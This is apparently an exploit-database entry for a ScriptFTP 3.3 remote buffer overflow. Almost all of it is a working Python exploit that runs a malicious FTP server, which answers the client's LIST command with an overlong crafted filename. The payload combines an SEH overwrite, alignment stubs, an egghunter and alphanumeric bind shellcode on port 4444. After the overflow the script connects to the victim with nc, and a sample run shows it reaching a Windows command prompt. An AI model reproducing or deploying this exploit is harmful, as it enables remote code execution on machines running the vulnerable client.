ScriptFTP 3.3 Buffer Overflow

`# Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST)  
# Date: September 20, 2011  
# Author: modpr0be  
# Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe  
# Version: 3.3  
# Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536)  
# CVE : -  
#  
# Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner  
#  
# You should create your own script to work with ScriptFTP  
# for example; enable passive and get the remote directory  
# on your evil ftp server.  
#  
# my example script:  
# OPENHOST("8.8.8.8","ftp","ftp")  
# SETPASSIVE(ENABLED)  
# GETLIST($list,REMOTE_FILES)  
# CLOSEHOST  
# save it to a file with .ftp extension (eg: exploit.ftp)  
  
# root@bt :/# python scriptftp-bof-poc.py  
# [*] ScriptFTP 3.3 Remote Buffer Overflow POC  
# [*] by modpr0be[at]digital-echidna[dot]org.  
# [*] thanks a lot to cyb3r.anbu | otoy :)  
# =============================================  
# [*] Evil FTP Server Ready  
# [*] Server initiated.  
# [*] Awaiting connection...  
# [*] Connection created by 172.16.87.129.  
# [*] Establishing session.  
# [*] Pwning in progress..  
# [*] This may take up 50 seconds or less.  
# [!] Hunter is hunting the Egg ;)  
# [!] Waiting for a shell..  
# [!] 0wn3d..!  
#  
# Microsoft Windows XP [Version 5.1.2600]  
# (C) Copyright 1985-2001 Microsoft Corp.  
#  
# C:\Program Files\ScriptFTP>  
#  
# Yes, this poc is using PASSIVE connection and it will  
# take some time to establish. I love the way we wait for a shell ;)  
  
#!/usr/bin/python  
  
import socket  
import os  
import sys  
import time  
  
class ftp_server:  
def __init__(self):  
self.host = '0.0.0.0'  
self.passive_port = 7214  
self.log("""  
[*] ScriptFTP <=3.3 Remote Buffer Overflow POC  
[*] by modpr0be[at]digital-echidna[dot]org  
[*] thanks a lot to cyb3r.anbu | otoy :)  
=============================================  
[*] Evil FTP Server Ready""")  
  
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
self.sock.bind(('', 21))  
self.sock.listen(1)  
  
a = self.passive_port/256  
b = self.passive_port%256  
self.tuple_port = (a, b)  
self.host_join = ','.join(self.host.split('.'))  
self.passive = False  
  
self.log("[*] Server initiated.")  
  
def log(self, msg):  
print msg  
  
def get(self):  
return self.conn.recv(1024).replace('\r', '').replace('\n', '')  
  
def getcwd(self):  
return os.getcwd().split(chr(92))[-1]  
  
def put(self, ftr):  
x = {  
  
150:" Data connection accepted from %s:%s; transfer starting.\r\n226 Listing completed."%(self.host, self.passive_port),  
200:" Type okay.",  
220:" %s Server is ready."%self.host,  
226:" Listing completed.",  
227:" Entering Passive Mode (%s,%s,%s)"%(self.host_join, self.tuple_port[0], self.tuple_port[1]),  
230:" User logged in, proceed.",  
250:' "/%s" is new cwd.'%self.getcwd(),  
257:' "/%s" is cwd.'%self.getcwd(),  
331:" User name okay, need password.",  
502:" Command not implemented.",  
551:" Requested action aborted. Page type unknown."   
  
}[ftr]  
  
s = '%s%s\r\n'%(ftr, x)  
self.conn.send(s)  
return s  
  
def main(self):  
self.log("[*] Awaiting connection...")  
self.conn, addr = self.sock.accept ()  
self.log("[*] Connection created by %s.\n[*] Establishing session."%addr[0])  
self.put(220)  
self.log("[*] Pwning in progress..")  
self.log("[*] This may take up 50 seconds or less.")  
  
while 1:  
try:  
data = self.get().upper()  
except socket.error:  
self.conn.close()  
self.sock.shutdown(socket.SHUT_RDWR)  
raise socket.error  
  
if data[:4] == 'USER': s = 331  
elif data[:4] == 'PASS': s = 230  
elif data[:3] == 'PWD': s = 257  
elif data[:4] == 'TYPE': s = 200  
elif data[:4] == 'PASV':  
# create passive port  
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
self.sock2.bind(('', self.passive_port ))  
self.sock2.listen(1)  
s = self.put(227)  
self.conn2, addr = self.sock2.accept()  
self.passive = True  
s = 0 # don't routine  
  
elif data[:3] == 'CWD':  
try:  
os.chdir('..%s'%data.split(' ')[-1])  
s = 250  
except OSError:  
s = 551  
  
elif data[:4] == 'LIST':  
s = self.put(150)  
s = self.passive_do(1)  
s = 0 # don't routine  
print "[!] Hunter is hunting the Egg ;)"  
time.sleep(50)  
print "[!] Waiting for a shell.."  
time.sleep(2)  
print "[!] 0wn3d..!\n"  
os.system("nc %s 4444"%addr[0])  
sys.exit()  
else:  
s = 502  
  
if s:  
s = self.put(s)  
  
def passive_do(self, id):  
if id == 1:  
#bind to port 4444  
bind = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ"  
"APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"  
"IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI"  
"XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO"  
"8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J"  
"P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1"  
"8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL"  
"MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4"  
"KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2"  
"1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3"  
"80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX"  
"U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM"  
"2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP"  
"8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK"  
"OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO"  
"TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P"  
"SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9"  
"E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW"  
"KQ7MCT2BO2JKPQCKOZ5A")  
  
# 32bit egghunter from corelanc0d3r, thx ;)  
egghunter = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"  
"IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"  
"8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"  
"ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"  
"HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"  
"SEYWKOYWA")  
  
junk = "A" * 1746 #junk  
nseh = "\x61\x62" #nseh  
seh = "\x45\x5B" #seh ppr somewhere on scriptftp dir  
  
#prepare for align  
align = "\x60" #pushad  
align += "\x73" #nop/align  
align += "\x53" #push ebx  
align += "\x73" #nop/align  
align += "\x58" #pop eax  
align += "\x73" #nop/align  
align += "\x05\x02\x11" #add eax,0x11000200  
align += "\x73" #nop/align  
align += "\x2d\x01\x11" #sub eax,0x11000120  
align += "\x73" #nop/align  
  
#walking  
walk = "\x50" #push eax  
walk += "\x73" #nop/align  
walk += "\xc3" #ret  
  
#align again  
align2 = "0t0t" + "\x73\x57\x73\x58\x73" #nop/push edi/nop/pop eax/nop  
align2 += "\xb9\x1b\xaa" #mov ecx,0xaa001b00  
align2 += "\xe8\x73" #add al,ch + nop  
align2 += "\x50\x73\xc3" #push eax,nop,ret  
  
sampah1 = "\x44" * 106 + "\x73" #eax+106/align nop  
sampah2 = "\x42" * 544 #right after shellcode  
  
crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1  
  
res = """-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 """+crash+""".txt\r\ndrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 A\r\nrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 """+ crash +".txt\r\n"  
  
self.conn2.send(res)  
# self.conn2.send('\r\n') # send blank  
return res  
  
try:  
ftp_server().main()  
except socket.error:  
print "[!] Socket is not ready, shutting down...\n"  
  
`